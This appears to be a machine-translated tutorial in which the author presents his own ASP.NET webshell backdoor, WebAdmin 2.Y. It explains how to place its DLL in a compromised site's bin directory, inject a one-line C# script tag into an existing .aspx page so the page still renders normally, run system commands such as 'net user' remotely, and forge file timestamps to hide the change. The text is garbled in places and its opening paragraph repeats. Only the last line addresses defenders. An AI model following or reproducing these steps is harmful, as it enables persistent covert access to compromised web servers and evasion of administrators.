C/S backdoor under ASP. Net -- WebAdmin 2. Y application details

Hello everyone, I wonder if you have used WebAdmin 2.x? Well, that's the backdoor in the ASP. Net environment. That's my immature work. If there's anything that doesn't work well, I 'd like to bear it with me. Oh, today, let's try again and tell you something about WebAdmin.
Hello everyone, I wonder if you have used WebAdmin 2.x? Well, that's the backdoor in the ASP. Net environment. That's my immature work. If there's anything that doesn't work well, I 'd like to bear it with me. Oh, today, let's try to show you the latest version of WebAdmin-WebAdmin 2.y.

WebAdmin 2. Y functions are roughly the same as 2. X, but 2. Y is C/S. C/S is the trend of the times. The advantage of C/S is that it can insert a very short piece of code into a normal file, and leave no trace of POST control. It is really an essential medicine for killing people and traveling at home.

Let's talk nonsense. Let's take a look at the instructions first.

Since it is a backdoor under ASP. Net, of course the ASP. Net environment is required. In general, Windows2003 is supported by default, and Windows2000/XP requires the installation of. Net FrameWork.

Anyone who has played C/S backdoors under ASP should know that the C/S backdoors of ASP are easy to put. They just need to find an ASP file and add the code "execute request (" s ") "or" eval request ("s") "is very simple. The execute function is used to execute code, but there is no similar function in ASP. Net, so it is more complicated to implement C/S.

In ASP. in the. Net environment, you can compile the code into a dll file to improve execution efficiency. This is similar to the component mechanism in ASP, but you do not need to register it here, you only need to put the compiled dll under the bin directory of the root directory of the website to call the self-developed components.

WebAdmin2.Y is based on this component idea. The server-side dll is the WebAdmin2Y. dll you see now. This file must be placed under the bin subdirectory of the controlled website's Web directory. Some systems do not have bin folders in the Web directory, so we can create a new one for it. The code is included in SampleCSharp. aspx and SampleVB. aspx. Because the ASPX file can be written in VB. Net or C #, SampleCSharp. aspx contains the C # code, and SampleVB. aspx is the VB. Net code. You can select this option based on your needs.

The webadmin2y.htm is used locally. The interface is full of English, so don't scold me for being fond of others. In fact, the main purpose is to practice English.

Is it dizzy? Well, I will give you an example to show you how to use this stuff.

I even set up an IIS5.1 +. Net FrameWork environment locally. The Web directory is E: MyWeb. The system that we want to leave a backdoor is dynamic network news 4.1 (ASP. Net Program), which is located at E: MyWebdvnews. The N-dll file of the internet news must be placed in the bin directory (E: MyWebin) of the Web directory during installation ).

Suppose I have intruded into the local host. Now I want to use WebAdmin 2. Y to leave a C/S Web backdoor.

First, put the dll file WebAdmin2Y. dll in the bin directory of the Web directory (here E: MyWebin). Note that the name WebAdmin2Y. dll cannot be changed.

Next we need to find an affected file, which is generally. aspx. Haha, here I just selected mail. aspx (really poor ~~). Because the Internet news is written in C #, I need to use the code in SampleCSharp. aspx.

Now open the file mail. aspx. The first line is ASP. net header (starting with "<% @"). This is annoying. Don't touch it. before marking the html header after the Net header, here is the 2nd line) insert SampleCSharp. code in aspx:

<Script language = "C #" runat = "server">

WebAdmin2Y. x. y aaaaa = new WebAdmin2Y. x. y ("add6bb58e139be10 ");

</Script>

Here, I would also like to say: if the aspx file you want to modify contains "<script runat =" server "> ...... </Script> "tag, you do not need to copy the script tag any more-Because An aspx file can only have one" <script runat = "server"> ...... </Script> ". It is best to prepare a copy before editing the file. Be careful if you leave a backdoor and fail to screw up your website.

Haha, now the webshell has been reserved. Try directly accessing the mail. aspx file (figure 1 ).

The normal page is displayed during direct access. OK!

Now, their clients run the webadmin2y.htm tool (figure 2)

X. Let's first introduce the client interface.

"The URL" is your backdoor address. Here we should fill in "http: // 127.0.0.1/dvnews/mail. aspx"; "Password" is your Password. I don't know if you haven't noticed it. The code we just left in the mail. aspx file contains something similar to MD5-"add6bb58e139be10 ". It's your password. How can I get this password? The main interface of the client has a "Get Your Encode Password" link. When you click it, a page pops up to obtain Your own Password (Figure 3 ). Here "add6bb58e139be10" is "webadmin ". The algorithm is simple, that is, the first 16 digits of the MD5 value of the password (shouldn't it be the middle 16 digits? Hey, I mean it ).

Function is the Function list. The functions here include ABOUT (ABOUT), Attributes (view and modify file Attributes, newly added), Command (execute CMD), CloneTime (clone time), Copy File & Folder (Copy), Database (operate MSSQL or Access Database), Delete (Delete), Edit TextFile (Edit), File List (column directory) new File & Folder (New), ReadReg (read Registry), Rename (Rename), SQLRootKit, Server Variable (basic information), UploadFile (upload), and DownLoad File (DownLoad ). You can select the corresponding function and click "Send" in the following form to complete the function.

For example, I am executing the "net user" command (figure 4, figure 5)

Haha, you can see the result. Here is just a demonstration. You need to try more WebAdmin2.Y functions on your own.

Hey, let's finally remind you that the client has a CloneTime function that can change the creation time and last modification time of a file to the same as that of another file. Use it to get rid of the time of the file you just modified. ^_^

For administrators or anti-virus software, the easiest way to deal with WebAdmin2.Y is to check whether WebAdmin2Y is in the bin. if you delete the dll file without resuming the modified file, it may cause the website application to crash. Ask the Administrator to think twice.